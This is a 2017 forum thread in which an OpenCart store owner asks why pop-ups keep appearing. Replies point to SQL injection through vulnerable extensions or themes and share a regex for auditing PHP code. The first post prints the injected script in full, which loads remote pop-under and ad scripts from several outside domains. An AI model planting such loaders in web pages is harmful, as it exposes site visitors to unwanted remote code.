Page 1 of 1
OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 20, 2017 10:55 pm
by ScuzUK
I'm brand spanking new to opencart but I keep getting pop ups after fresh installs. Each install I've changed the admin name/password, changed the admin url but it keeps happening.
Whats the cause and how can I stop it?
Code: Select all
<script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
"enabled": true
},
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:08 am
by IP_CAM
Well, what are you trying to tell us?
The Code, you've added, has nothing to do with OC.
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:29 am
by ScuzUK
Every time I look at the category description in code in open cart its been changed to the following:
What is causing this and how do I stop it?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 12:59 am
by k2tec
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 2:42 am
by ScuzUK
Did I miss a "fix" in that thread? Not being rude, totally grateful for the help but I don't see a change this or upload this.
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 3:04 am
by IP_CAM
well, what FIX do you expect ? There is no simple Fix for such,
it depends on many different things, starting from the server setup
and ending on the individual Software and Installation. That's why it takes
Professionals, to secure Servers and Software, and it's an ongoing
task, to keep it secure. So, better click the link on k2tec's posting, and
you find at least some valuable Information, on, what you can do about.
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 3:16 am
by k2tec
Like IP_CAM says there is no simple solution for this problem. It can be your own PC or a bad module. Or your neighbor on a shared server.
You have to compare your site with orginal files of OC and search for src='//p79479.clksite.com in your database and delete the javascript.
If it is a fresh install download it from the OC site and not with the installer of your hoster.
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Wed Jun 21, 2017 9:23 pm
by ADD Creative
What theme and extensions are you using? Have you looked in your server logs to see if there is anything unusual?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 22, 2017 7:12 pm
by sims
There is a pattern emerging here
What we know as facts:
1 Affects Opencart from versions 1.5.5.1 to 2.3.0.2
2. A wide variety of different themes
3. The code is injected into the database
4. No file(s) are uploaded or altered on the web server
5. No admin login used
6. Many different Hosting companies
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 22, 2017 8:22 pm
by IP_CAM
well, I am not sure, and so far, I never have heard of someone yet, using a v.1.5.6.x Version,
so, I assume, that it could likely also be an OcMod, doing such things. This, since OcMod Content
it placed in the DB, in contrary to VqMod Content, and if a smart fellow would be able, to
modify an OcMod, it would be the easiest way to mess up a software. And even an unsuccessful
attempt, to install an OcMod, usually leaves it's content in a Shop Extension Directory, until removed again,
as I found out, so, a real Pro may find different ways, to add bad Code, without a user beeing aware of it.
Just a wild guess...
Ernie
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 27, 2017 4:45 am
by ADD Creative
sims wrote: ↑Thu Jun 22, 2017 7:12 pm
There is a pattern emerging here
What we know as facts:
1 Affects Opencart from versions 1.5.5.1 to 2.3.0.2
2. A wide variety of different themes
3. The code is injected into the database
4. No file(s) are uploaded or altered on the web server
5. No admin login used
6. Many different Hosting companies
That does seem to be the case. Given that there have been a few reports of the code injected into the database, but not the 1000s you would expect if every OpenCart store was vulnerable (I've not seen it on any of our client's sites so far). There has been at least one known theme with a vulnerability, so could be more out there (
viewtopic.php?f=179&t=183812). I believe the issue is less likely to do with the OpenCart core and more likely to be down to extensions or configuration for the following reasons.
While working on sites for clients, we've found a few extension that have had SQL vulnerabilities (we reported these to the authors). At least one of these was used to successfully attack a site. There must be 100s of badly written extensions out there.
I've looked through a lot of the code for version 1.5.5.1, for a project I work on backporting bug fixes and security fixes to older versions of OpenCart. I've not seen any places where SQL could be injected (that's not to say there isn't). I've use the follow regex search in a text editor (Notepad++ but other will also do it). It's not perfect and will miss a lot and for 1.5.5.1 it finds 12 hits in 7 files of possible places, but nothing looks like they could be used in an injection to me.
Code: Select all
'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+
Can you run the regex search on your 1.5.5.1 install to see if you get anything different (search .php, .tpl and .xml files)?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Tue Jun 27, 2017 7:39 pm
by sims
@ADD creative
thanks for taking the time to reply
I stand by my statements - they are all correct (I did not say it was due to core Opencart files)
I literally searched for that regex string (is that what you meant me to do?) and could not find it
EDIT forget that! I forgot to tick the regex box
What do you want me do with search results ?
Re: OpenCart 2.3.0.2 - Category Description - Exploit?
Posted: Thu Jun 29, 2017 12:33 am
by ADD Creative
How many results did it get? You could post the results here (remove anything other shouldn't see first). Or message me them and I'll compare to a default install of 1.5.5.1.